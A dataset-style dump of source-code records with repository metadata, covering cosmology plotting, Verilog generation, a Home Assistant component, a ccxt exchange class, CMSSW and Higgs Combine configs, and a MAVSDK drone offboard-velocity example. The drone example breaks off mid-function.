blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9fe14f76ed7f167080c56d6ae5377451ea028db9
|
607241e619ca499121106b218a5e00ac5244bda3
|
/analysis/zeldovich_enzo_mass.py
|
808a1269774d71bef4bd037a05e3c33e5614d2a5
|
[] |
no_license
|
bvillasen/cosmo_sims
|
37caea950c7be0626a5170333bfe734071c58124
|
8b20dc05842a22ea50ceb3d646037d2e66fc8c9b
|
refs/heads/master
| 2020-04-22T23:22:28.670894 | 2020-01-02T23:32:39 | 2020-01-02T23:32:39 | 114,167,239 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,713 |
py
|
# Plot the total gas "mass" vs. redshift for several Cholla Zeldovich-pancake
# runs, comparing reconstruction schemes (PLMC/PLMP/PPMC/PPMP variants).
# NOTE: Python 2 script (uses print statements); intended to run under MPI,
# one rank per snapshot by default.
import sys
import numpy as np
import matplotlib.pyplot as plt
import h5py as h5
import yt
# Local developer tree; project helper modules are made importable below.
dev_dir = '/home/bruno/Desktop/Dropbox/Developer/'
cosmo_dir = dev_dir + 'cosmo_sims/'
toolsDirectory = cosmo_dir + "tools/"
sys.path.extend([toolsDirectory ] )
from load_data_cholla import load_snapshot_data
from internal_energy import get_internal_energy, get_temp, get_Temperaure_From_Flags_DE
# from load_data_enzo import load_snapshot_enzo
from cosmo_constants import *
from tools import create_directory
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
nSnap = rank  # default snapshot index per MPI rank (reassigned in the loop below)
# rank = 0
dataDir = '/raid/bruno/data/'
# dataDir = '/home/bruno/Desktop/data/'
data_set = 'enzo_simple_beta_convDE'
startSnap = 27
enzoDir = dataDir + 'cosmo_sims/enzo/ZeldovichPancake_HLLC/'
outDir = dev_dir + 'figures/zeldovich_mass/'
# Only rank 0 creates the output directory, avoiding a race between ranks.
if rank == 0:
  create_directory( outDir )
a_list = []
gamma = 5./3  # adiabatic index of the gas
j_indx = 0
i_indx = 0
L = 64.   # box length (units presumably comoving Mpc/h -- TODO confirm)
n = 256   # cells along the axis
dx = L / ( n )
x = np.arange(0, 256, 1)* dx + 0.5*dx  # cell-center coordinates
dv = (dx*1e3)**3  # cell volume with dx scaled by 1e3 -- NOTE(review): verify unit conversion
# One directory per run configuration being compared.
chollaDir_0 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PLMC_HLLC_VL_eta0.001_0.030_z1/'
chollaDir_1 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PLMP_HLLC_VL_eta0.001_0.030_z1/'
chollaDir_2 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMC_HLLC_VL_eta0.001_0.030_z1_ic0/'
chollaDir_3 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic64/'
chollaDir_4 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic32/'
chollaDir_5 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic4/'
chollaDir_6 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic0/'
# chollaDir_3 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMC_HLLC_VL_eta0.001_0.030_z1_signStone/'
dir_list = [ chollaDir_0, chollaDir_1, chollaDir_2, chollaDir_3, chollaDir_4, chollaDir_5, chollaDir_6 ]
labels = ['PLMC', 'PLMP', 'PPMC_ic0', 'PPMP_ic64', 'PPMP_ic32', 'PPMP_ic4', 'PPMP_ic0', ]
out_file_name = 'zeldovich_mass.png'
#Plot UVB uvb_rates
nrows=1
ncols = 1
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(10*ncols,8*nrows))
lw = 3
for i,chollaDir in enumerate(dir_list):
  print chollaDir
  mass = []
  z = []
  # Accumulate the summed gas density for the first 50 snapshots of this run.
  for nSnap in range(50):
    data_cholla = load_snapshot_data( nSnap, chollaDir )
    current_z = data_cholla['current_z']
    dens_ch = data_cholla['gas']['density'][...]
    # NOTE(review): a total mass would normally be density.sum() * dv;
    # here the sum is divided by dv -- confirm the intended normalization.
    mass_tot = dens_ch.sum() / dv
    z.append(current_z)
    mass.append( mass_tot )
  # print mass
  ax.plot( z, mass, label=labels[i] )
ax.legend()
ax.set_xlabel('Redshift')
ax.set_ylabel(r'Mass [$\mathrm{M}_{\odot}/h$ ]')
fig.savefig( outDir+out_file_name, bbox_inches='tight', dpi=100)
|
[
"[email protected]"
] | |
921a1439c4b41746c803c1027e09f0d1502c2b93
|
55dc6e337e634acb852c570274a1d0358b7300a5
|
/tests/core/intz/intz.py
|
32ff67f7a362dffe3e6e8699ccb651f1b494c791
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
fifoteam/veriloggen
|
97ad45671f053c85f495b08a030f735fd9822146
|
23cb7251c0f126d40d249982cad33ef37902afef
|
refs/heads/master
| 2020-05-27T00:28:37.575411 | 2017-02-20T01:47:00 | 2017-02-20T01:47:00 | 82,518,602 | 2 | 0 | null | 2017-02-20T05:02:37 | 2017-02-20T05:02:37 | null |
UTF-8
|
Python
| false | false | 989 |
py
|
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
# the next line can be removed after installation
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
from veriloggen import *
def mkLed():
    """Build and return the 'blinkled' veriloggen Module.

    The module keeps a free-running 32-bit cycle counter that wraps every
    1024 clock cycles; on the wrap cycle the LED output register is driven
    with a high-impedance value (IntZ).
    """
    m = Module('blinkled')
    width = m.Parameter('WIDTH', 8)  # bus width of the LED output
    clk = m.Input('CLK')
    rst = m.Input('RST')
    led = m.OutputReg('LED', width)
    count = m.Reg('count', 32)
    # Counter process: synchronous reset to 0, count up, wrap after 1023.
    m.Always(Posedge(clk))(
        If(rst)(
            count(0)
        ).Else(
            If(count == 1023)(
                count(0)
            ).Else(
                count(count + 1)
            )
        ))
    # LED process: reset drives 0; on the cycle the counter tops out,
    # assign high-impedance (IntZ) to LED.
    m.Always(Posedge(clk))(
        If(rst)(
            led(0)
        ).Else(
            If(count == 1024 - 1)(
                led(IntZ())
            )
        ))
    return m
if __name__ == '__main__':
    led = mkLed()
    # to_verilog('') presumably returns the generated code as a string rather
    # than writing a file -- confirm against the veriloggen API docs.
    verilog = led.to_verilog('')
    print(verilog)
|
[
"[email protected]"
] | |
daf504ddb048bd9ff53c1be218bdef13eb0e3612
|
978d8f24f4985c61c2dce534a279abe6ffeff433
|
/custom_components/blueprint/__init__.py
|
7f90a41bded995d9a9e736289b3e45a104db0064
|
[
"MIT"
] |
permissive
|
JiriKursky/blueprint
|
3c1ad02c4726539ab07fc407b6c53ef4c903448b
|
92ae97dc5fec3a9a6e6e14031c32bbf2f1953ff6
|
refs/heads/master
| 2022-01-27T16:24:27.521422 | 2019-07-20T10:52:46 | 2019-07-20T10:52:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,577 |
py
|
"""
Component to integrate with blueprint.
For more details about this component, please refer to
https://github.com/custom-components/blueprint
"""
import os
from datetime import timedelta
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import discovery
from homeassistant.util import Throttle
from .const import (
CONF_BINARY_SENSOR,
CONF_ENABLED,
CONF_NAME,
CONF_PASSWORD,
CONF_SENSOR,
CONF_SWITCH,
CONF_USERNAME,
DEFAULT_NAME,
DOMAIN_DATA,
DOMAIN,
ISSUE_URL,
PLATFORMS,
REQUIRED_FILES,
STARTUP,
VERSION,
)
# Minimum interval between two client refreshes, enforced by @Throttle below.
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=30)
_LOGGER = logging.getLogger(__name__)
# Per-platform entry schema: each entry can be disabled and given a name.
BINARY_SENSOR_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_ENABLED, default=True): cv.boolean,
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    }
)
SENSOR_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_ENABLED, default=True): cv.boolean,
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    }
)
SWITCH_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_ENABLED, default=True): cv.boolean,
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    }
)
# Top-level configuration: optional credentials plus lists of per-platform
# entries; ALLOW_EXTRA lets unrelated config keys pass through untouched.
CONFIG_SCHEMA = vol.Schema(
    {
        DOMAIN: vol.Schema(
            {
                vol.Optional(CONF_USERNAME): cv.string,
                vol.Optional(CONF_PASSWORD): cv.string,
                vol.Optional(CONF_BINARY_SENSOR): vol.All(
                    cv.ensure_list, [BINARY_SENSOR_SCHEMA]
                ),
                vol.Optional(CONF_SENSOR): vol.All(cv.ensure_list, [SENSOR_SCHEMA]),
                vol.Optional(CONF_SWITCH): vol.All(cv.ensure_list, [SWITCH_SCHEMA]),
            }
        )
    },
    extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
    """Set up this component from YAML configuration.

    Returns False (aborting setup) if required files are missing; otherwise
    stores a BlueprintData wrapper in hass.data and schedules discovery of
    each enabled platform entry.
    """
    # Import client from a external python package hosted on PyPi
    from sampleclient.client import Client
    # Print startup message
    startup = STARTUP.format(name=DOMAIN, version=VERSION, issueurl=ISSUE_URL)
    _LOGGER.info(startup)
    # Check that all required files are present
    file_check = await check_files(hass)
    if not file_check:
        return False
    # Create DATA dict
    hass.data[DOMAIN_DATA] = {}
    # Get "global" configuration.
    username = config[DOMAIN].get(CONF_USERNAME)
    password = config[DOMAIN].get(CONF_PASSWORD)
    # Configure the client.
    client = Client(username, password)
    hass.data[DOMAIN_DATA]["client"] = BlueprintData(hass, client)
    # Load platforms
    for platform in PLATFORMS:
        # Get platform specific configuration
        platform_config = config[DOMAIN].get(platform, {})
        # If platform is not enabled, skip.
        if not platform_config:
            continue
        for entry in platform_config:
            entry_config = entry
            # If entry is not enabled, skip.
            if not entry_config[CONF_ENABLED]:
                continue
            # Fire-and-forget: platform setup runs as a background task.
            hass.async_create_task(
                discovery.async_load_platform(
                    hass, platform, DOMAIN, entry_config, config
                )
            )
    return True
class BlueprintData:
    """Holds the API client and pushes fresh data into hass.data."""

    def __init__(self, hass, client):
        """Keep references to the hass instance and the API client."""
        self.client = client
        self.hass = hass

    @Throttle(MIN_TIME_BETWEEN_UPDATES)
    async def update_data(self):
        """Fetch data from the client and cache it under DOMAIN_DATA."""
        # Main platform-data refresh; throttled to one call per interval.
        try:
            self.hass.data[DOMAIN_DATA]["data"] = self.client.get_data()
        except Exception as error:  # pylint: disable=broad-except
            _LOGGER.error("Could not update data - %s", error)
async def check_files(hass):
    """Return True if every file listed in REQUIRED_FILES is present.

    hass: Home Assistant core object; only hass.config.path() is used to
    locate the configuration directory.  Logs a critical message listing
    any missing files and returns False in that case.
    """
    # Base directory of this custom component inside the user's config dir.
    base = "{}/custom_components/{}/".format(hass.config.path(), DOMAIN)
    # Collect every required file the user failed to download.
    missing = [file for file in REQUIRED_FILES if not os.path.exists(base + file)]
    if missing:
        _LOGGER.critical("The following files are missing: %s", str(missing))
        return False
    return True
|
[
"[email protected]"
] | |
e7b1a107e606889f4d2ea63f1cc95c913cd2cef3
|
13800b7827598e76428a335559b7bf11867ec2f0
|
/python/ccxt/async_support/binancecoinm.py
|
62ca72174bcc92699c5987d6f42bca5163a236e1
|
[
"MIT"
] |
permissive
|
ccxt/ccxt
|
b40a0466f5c430a3c0c6026552ae697aa80ba6c6
|
e4065f6a490e6fc4dd7a72b375428b2faa570668
|
refs/heads/master
| 2023-09-04T03:41:29.787733 | 2023-09-03T19:25:57 | 2023-09-03T19:25:57 | 91,253,698 | 30,798 | 8,190 |
MIT
| 2023-09-14T21:59:09 | 2017-05-14T15:41:56 |
Python
|
UTF-8
|
Python
| false | false | 1,683 |
py
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.binance import binance
from ccxt.abstract.binancecoinm import ImplicitAPI
class binancecoinm(binance, ImplicitAPI):
    """ccxt adapter for Binance COIN-M (coin-margined, 'inverse') futures.

    Behavior is inherited from the spot ``binance`` class; this subclass only
    overlays COIN-M exchange metadata and wallet-transfer helpers.
    Generated file -- see the header note: do not edit by hand.
    """

    def describe(self):
        """Return exchange metadata, deep-merging COIN-M overrides on top of binance's."""
        return self.deep_extend(super(binancecoinm, self).describe(), {
            'id': 'binancecoinm',
            'name': 'Binance COIN-M',
            'urls': {
                'logo': 'https://user-images.githubusercontent.com/1294454/117738721-668c8d80-b205-11eb-8c49-3fad84c4a07f.jpg',
                'doc': [
                    'https://binance-docs.github.io/apidocs/delivery/en/',
                    'https://binance-docs.github.io/apidocs/spot/en',
                ],
            },
            'has': {
                'CORS': None,
                'spot': False,
                'margin': False,
                'swap': True,
                'future': True,
                'option': None,
                'createStopMarketOrder': True,
            },
            'options': {
                # COIN-M markets are inverse contracts (settled in the base coin).
                'fetchMarkets': ['inverse'],
                'defaultSubType': 'inverse',
                'leverageBrackets': None,
            },
        })

    async def transfer_in(self, code: str, amount, params={}):
        # transfer from spot wallet to coinm futures wallet (transfer type code 3)
        return await self.futuresTransfer(code, amount, 3, params)

    async def transfer_out(self, code: str, amount, params={}):
        # transfer from coinm futures wallet to spot wallet (transfer type code 4)
        return await self.futuresTransfer(code, amount, 4, params)
|
[
"[email protected]"
] | |
7163f816dfd5db84ab30220ee8fb101ce0b68c6c
|
66e6360325b781ed0791868765f1fd8a6303726f
|
/TB2009/WorkDirectory/5173 Pulse Timing/Pion_108538.py
|
e53460495e0c5366f4f533ec68de84b6c0a8447d
|
[] |
no_license
|
alintulu/FHead2011PhysicsProject
|
c969639b212d569198d8fce2f424ce866dcfa881
|
2568633d349810574354ad61b0abab24a40e510e
|
refs/heads/master
| 2022-04-28T14:19:30.534282 | 2020-04-23T17:17:32 | 2020-04-23T17:17:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,320 |
py
|
# CMSSW configuration: pulse-timing alignment for test-beam pion run 108538.
import FWCore.ParameterSet.Config as cms
process = cms.Process("EventDisplay")
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(-1)  # -1: process every event in the source
)
# Raw test-beam source; streams list the FEDs/chunks to unpack.
process.source = cms.Source("HcalTBSource",
    fileNames = cms.untracked.vstring("file:/tmp/chenyi/HTB_108538.root"),
    streams = cms.untracked.vstring('Chunk699', 'HCAL_Trigger', 'HCAL_SlowData', 'HCAL_QADCTDC', 'HCAL_DCC021')
)
# Unpack test-beam objects; the integers below are FED ids.
process.tbunpack = cms.EDFilter("HcalTBObjectUnpacker",
    #IncludeUnmatchedHits = cms.untracked.bool(False),
    HcalTriggerFED = cms.untracked.int32(1),
    HcalVLSBFED = cms.untracked.int32(699),
    HcalTDCFED = cms.untracked.int32(8),
    HcalQADCFED = cms.untracked.int32(8),
    HcalSlowDataFED = cms.untracked.int32(3),
    ConfigurationFile = cms.untracked.string('configQADCTDC_TB2009.txt')
)
# VLSB sample window and calibration inputs; only motherboard 0 is used.
process.vlsbinfo = cms.EDProducer("VLSBInformationProducer",
    minSample = cms.untracked.uint32(0),
    maxSample = cms.untracked.uint32(31),
    baselineSamples = cms.untracked.uint32(2),
    mip = cms.untracked.string("MIP_EarlyRejection.txt"),
    useMotherBoard0 = cms.untracked.bool(True),
    useMotherBoard1 = cms.untracked.bool(False),
    useMotherBoard2 = cms.untracked.bool(False),
    useMotherBoard3 = cms.untracked.bool(False),
    usePedestalMean = cms.untracked.bool(False)
)
process.ABCcut = cms.EDFilter("SingleTowerParticleFilter")
process.hitcut = cms.EDFilter("HitXFilter",
    maximum = cms.untracked.double(-5)
)
process.MessageLogger = cms.Service("MessageLogger",
    default = cms.untracked.PSet(
        reportEvery = cms.untracked.int32(100)  # throttle framework report frequency
    )
)
# Two alignment passes with different sample windows, written to separate files.
process.alignpion2 = cms.EDAnalyzer("AlignPulseAnalyzer",
    rejectionSample = cms.untracked.int32(2),
    rejectionHeight = cms.untracked.double(0.1),
    output = cms.untracked.string("Time_108538_2.root"),
    maxsample = cms.untracked.double(1000),
    minsample = cms.untracked.double(15)
)
process.alignpion1 = cms.EDAnalyzer("AlignPulseAnalyzer",
    rejectionSample = cms.untracked.int32(2),
    rejectionHeight = cms.untracked.double(0.1),
    output = cms.untracked.string("Time_108538_1.root"),
    maxsample = cms.untracked.double(40),
    minsample = cms.untracked.double(0)
)
# Execution order: unpack -> tower cut -> VLSB info -> hit cut -> both aligners.
process.p = cms.Path(
    process.tbunpack *
    process.ABCcut *
    process.vlsbinfo *
    process.hitcut *
    process.alignpion1 *
    process.alignpion2
)
|
[
"[email protected]"
] | |
ddb0511c7da10557a74469f32fdf621eef3c6942
|
3a093f6a40e8fb24957d277ad8f4b097d08c6d04
|
/result_scons/tools/cards.py
|
289cbf4c6c50e49e16d0902fa369f486a474e093
|
[] |
no_license
|
dlont/FourTops2016
|
ab9e953760e93b0e777b23478938efd30d640286
|
88c929bf98625735a92a31210f7233f799c5a10c
|
refs/heads/master
| 2021-01-18T22:23:52.796080 | 2019-07-31T12:34:03 | 2019-07-31T12:34:03 | 72,439,490 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,985 |
py
|
#!/usr/bin/env python
"""
Script for Higgs Combine cards creation
"""
import os
import sys
import time
import argparse
import logging
import json
from datetime import datetime
import pandas as pd
import numpy as np
import ROOT
from cards_proc_list import proc_id
from cards_syst_list import systtypelist
from cards_syst_list import syst_norm_size_list, syst_shape_size_list
from cards_bin_list import binlist
#Global definitions
def getObservation(ch, file, observable):
    """Collect per-bin event counts for channel *ch* from a ROOT *file*.

    Returns {ch: {bin_name: integral}} where the integral is taken from the
    histogram at '<bin-without-channel-prefix>/<observable>'.
    """
    logging.debug("----getObservation:-----")
    counts = {}
    for ibin in binlist[ch]:
        # Strip the channel prefix (e.g. mu6J2M -> 6J2M) to build the histogram path.
        hist_path = ibin.replace(ch, '') + '/' + observable
        logging.debug("Observations filename: " + file.GetName())
        logging.debug("Observations histname: " + hist_path)
        nevents = file.Get(hist_path).Integral()
        logging.debug("Integral: " + str(nevents))
        counts[ibin] = nevents
    return {ch: counts}
def mcRate(ch, files, observable):
    """Return {process: observation-dict} of MC predictions per process."""
    logging.debug("----mcRate:-----")
    logging.debug(files)
    # One getObservation call per process, keyed identically to proc_id.
    return {proc: getObservation(ch, files[proc], observable) for proc in proc_id.keys()}
def printCardHeader(arguments):
    """Write the datacard preamble (timestamp + imax/jmax/kmax counts).

    Python 2 'print >> f' chevron syntax writes to arguments.outfile.
    """
    print >> arguments.outfile, '#',str(datetime.now()), arguments
    print >> arguments.outfile, '-'*100
    print >> arguments.outfile, 'imax', len(binlist[arguments.channel])  # number of bins
    print >> arguments.outfile, 'jmax', len(proc_id)-1  # number of processes minus one
    print >> arguments.outfile, 'kmax', '*'  # '*': nuisance count left to be inferred
    print >> arguments.outfile, '-'*100
def printShapeFilesBlock(arguments):
    """Write the 'shapes' block mapping each bin/process to its histogram paths."""
    print >> arguments.outfile, '-'*100
    for ibin in binlist[arguments.channel]:
        # Histogram path inside the ROOT file: channel prefix stripped, observable appended.
        histname = ibin.replace(arguments.channel,'')
        histname = histname + '/' + arguments.observable
        logging.debug(histname)
        print >> arguments.outfile, 'shapes', 'data_obs', ibin, arguments.data, histname
        for proc in proc_id.keys():
            filename = arguments.sources[proc]
            logging.debug(filename)
            # $SYSTEMATIC is a placeholder substituted by the fitting tool
            # when it looks up the shape-variation histograms.
            systname = ibin.replace(arguments.channel,'')+'_$SYSTEMATIC/'+arguments.observable
            print >> arguments.outfile, 'shapes', proc, ibin, \
                filename, histname, systname
    print >> arguments.outfile, '-'*100
    return
def main(arguments):
    """Assemble and print the complete datacard.

    Order: header, shapes block, observation line, then one pandas table per
    process (labels, ids, rates, systematics) concatenated side by side.
    Returns 0 on success.
    """
    # pandas printing settings: keep wide tables on a single line
    pd.set_option('expand_frame_repr', False)
    pd.set_option('max_columns', 999)
    # Read-in input ROOT files, one per process
    files = {}
    for proc in arguments.sources.keys():
        files[proc] = ROOT.TFile.Open(arguments.sources[proc],"READ")
    printCardHeader(arguments)
    printShapeFilesBlock(arguments)
    # Get observations from the data file
    datafile = ROOT.TFile.Open(arguments.data,"READ")
    obs = getObservation(arguments.channel, datafile,arguments.observable)
    logging.debug( obs )
    # Printout observation block to file
    obsline = pd.DataFrame(obs[arguments.channel], columns=binlist[arguments.channel], index=['observation'])
    print >> arguments.outfile, '-'*100
    print >> arguments.outfile, 'bin', obsline
    print >> arguments.outfile, '-'*100
    # Get MC rate predictions
    rate = mcRate(arguments.channel,files,arguments.observable)
    logging.debug( rate )
    ch_dfs = []
    for proc in proc_id.keys():
        # Create new table for given process; 'NA' = nuisance not applicable
        s = pd.DataFrame('NA',
            columns=binlist[arguments.channel],
            index=systtypelist[arguments.channel].keys()
            )
        # Fill systematics description for this process
        # Normalization systematics
        df_update = pd.DataFrame.from_dict(syst_norm_size_list[arguments.channel][proc], orient='index')
        df_update.columns = binlist[arguments.channel]
        s.update(df_update)
        # Shape systematics
        df_update = pd.DataFrame.from_dict(syst_shape_size_list[arguments.channel][proc], orient='index')
        df_update.columns = binlist[arguments.channel]
        s.update(df_update)
        # Add process labels and id (first and second line, respectively).
        # NOTE(review): DataFrame.ix is removed in modern pandas; this script
        # requires an old pandas (and Python 2 -- see print statements).
        processline = pd.DataFrame(proc, columns=binlist[arguments.channel], index=['process'])
        s = pd.concat([s.ix[:0], processline, s.ix[0:]])
        processline = pd.DataFrame(proc_id[proc], columns=binlist[arguments.channel], index=['process '])
        s = pd.concat([s.ix[:1], processline, s.ix[1:]])
        rateline = pd.DataFrame(rate[proc][arguments.channel], columns=binlist[arguments.channel], index=['rate'])
        s = pd.concat([s.ix[:2], rateline, s.ix[2:]])
        print arguments.channel, proc
        logging.debug(s)
        ch_dfs.append(s)
    result = pd.concat(ch_dfs,axis=1)
    # Add column with systematic type (normalization or shape); blank when unknown
    lam = lambda x: systtypelist[arguments.channel][x] if x in systtypelist[arguments.channel] else ''
    result.insert(0,' ',result.index.map(lam))
    # Printout MC (rate and systematics) block to file
    print >> arguments.outfile, 'bin', result
    return 0
if __name__ == '__main__':
    start_time = time.time()
    # Command-line interface: input files, channel/observable selection,
    # output destination and logging verbosity.
    parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('--data', help="Data rootfile", required=True)
    parser.add_argument("--source", type=json.loads, dest='sources',
                        help='json dictionary with input definition', required=True)
    parser.add_argument('--channel', help="channel",default='mu')
    parser.add_argument('--observable', help="observable",default='allSF/bdt')
    # Defaults to stdout so the datacard can be piped.
    parser.add_argument('-o', '--outfile', help="Output file",
                        default=sys.stdout, type=argparse.FileType('w'))
    parser.add_argument(
        '-d', '--debug',
        help="Print lots of debugging statements",
        action="store_const", dest="loglevel", const=logging.DEBUG,
        default=logging.WARNING,
    )
    parser.add_argument(
        '-v', '--verbose',
        help="Be verbose",
        action="store_const", dest="loglevel", const=logging.INFO,
    )
    args = parser.parse_args(sys.argv[1:])
    print(args)
    logging.basicConfig(level=args.loglevel)
    logging.info( time.asctime() )
    exitcode = main(args)
    logging.info( time.asctime() )
    logging.info( 'TOTAL TIME IN MINUTES:' + str((time.time() - start_time) / 60.0))
    sys.exit(exitcode)
|
[
"[email protected]"
] | |
1f1529473302b02d543365662b5ea486c153d200
|
0cf7dd2c3c0b28b52f1273e8fe2ea0a87cacc6af
|
/ToLeftandRight.py
|
b17d2c4f0c6445bb843c71a099e74b7f273f481e
|
[] |
no_license
|
EngrDevDom/Everyday-Coding-in-Python
|
61b0e4fcbc6c7f399587deab2fa55763c9d519b5
|
93329ad485a25e7c6afa81d7229147044344736c
|
refs/heads/master
| 2023-02-25T05:04:50.051111 | 2021-01-30T02:43:40 | 2021-01-30T02:43:40 | 274,971,215 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 422 |
py
|
# ToLeftandRight.py
# Read integers from stdin and echo them back as a "staircase": each number
# larger than the previous one is indented one space further right, each
# smaller one a space further left.  Stops when the indentation returns to
# the left margin.
nums = []
num_of_space = 0  # current indentation level
current_num = int(input("Enter a number: "))
nums.append(current_num)
while True:
    num = int(input("Enter a number: "))
    if num > current_num: num_of_space += 1
    # Equal input is ignored entirely (not stored, comparison value unchanged)
    # -- presumably intended; confirm against the exercise statement.
    elif num == current_num: continue
    else: num_of_space -= 1
    current_num = num
    nums.append(" " * num_of_space + str(num))
    if num_of_space == 0: break  # back at the left margin: stop reading
for num in nums: print(num)
|
[
"[email protected]"
] | |
3cc3eff0e75bc844fb12fcaa253b0afbd4c3e476
|
1a6d5f58a5aaf478e3af1a880f155a2bcbd06aff
|
/PX4/MAVSDK-Python/offboard_velocity_body.py
|
d14407e6d1504bb49547099d1e336c087e9f2eaa
|
[
"MIT"
] |
permissive
|
yingshaoxo/suicide-squad
|
5b8858376bffe9d80e66debbd75e83b6fb6f5b6e
|
cadbd0d48e860a8747b59190fc67a5a114c3462b
|
refs/heads/master
| 2020-11-24T02:46:38.604339 | 2019-10-29T05:47:44 | 2019-10-29T05:47:44 | 227,932,669 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,055 |
py
|
#!/usr/bin/env python3
"""
Some caveats when attempting to run the examples in non-gps environments:
- `drone.action.arm()` will return a `COMMAND_DENIED` result because the action requires switching
to LOITER mode first, something that is currently not supported in a non-gps environment. You will
need to temporarily disable this part here:
`https://github.com/mavlink/MAVSDK/blob/develop/plugins/action/action_impl.cpp#L61-L65`
- `drone.offboard.stop()` will also return a `COMMAND_DENIED` result because it requires a mode
switch to HOLD, something that is currently not supported in a non-gps environment.
"""
import asyncio
from mavsdk import System
from mavsdk import (OffboardError, VelocityBodyYawspeed)
async def run():
    """ Does Offboard control using velocity body coordinates.

    Connects to the drone, configures takeoff parameters, arms, then issues a
    fixed sequence of body-frame velocity setpoints before stopping offboard
    mode and landing.
    """
    drone = System()
    await drone.connect(system_address="udp://:14540")
    # Set parameters
    await drone.param.set_float_param("MIS_TAKEOFF_ALT", 1.0)  # set takeoff height to 1 meter
    await drone.param.set_int_param("COM_TAKEOFF_ACT", 0)  # hold after takeoff
    await drone.param.set_int_param("COM_OBL_ACT", 0)  # 0: land if lost offboard signal; 1: hold if lost offboard signal
    # Start parallel tasks: altitude reporter runs alongside the command sequence.
    asyncio.ensure_future(print_altitude(drone))
    print("-- Arming")
    await drone.action.arm()
    # Offboard requires a setpoint to be streamed before starting.
    print("-- Setting initial setpoint")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, 0.0, 0.0))
    print("-- Starting offboard")
    try:
        await drone.offboard.start()
    except OffboardError as error:
        print(f"Starting offboard mode failed with error code: {error._result.result}")
        print("-- Disarming")
        await drone.action.disarm()
        return
    # NOTE(review): this commands only a climb (down = -1 m/s), no yaw --
    # the status message does not match the commanded velocity.
    print("-- Turn clock-wise and climb")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, -1, 0.0))
    await asyncio.sleep(5)
    # NOTE(review): commands a 0.1 m/s rightward drift, not a turn/climb.
    print("-- Turn clock-wise and climb")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.1, 0.0, 0.0))
    await asyncio.sleep(5)
    # NOTE(review): commands a 0.1 m/s leftward drift while saying "wait".
    print("-- Wait for a bit")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, -0.1, 0.0, 0.0))
    await asyncio.sleep(5)
    # NOTE(review): commands a 2 deg/s yaw spin for 20 s while saying "wait".
    print("-- Wait for a bit")
    await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, 0.0, 2.0))
    await asyncio.sleep(20)
    print("-- Stopping offboard")
    try:
        await drone.offboard.stop()
    except OffboardError as error:
        print(f"Stopping offboard mode failed with error code: {error._result.result}")
    print("-- Landing")
    await drone.action.land()
async def print_altitude(drone):
    """Print the drone's relative altitude (rounded to whole meters) whenever it changes."""
    last_reported = None
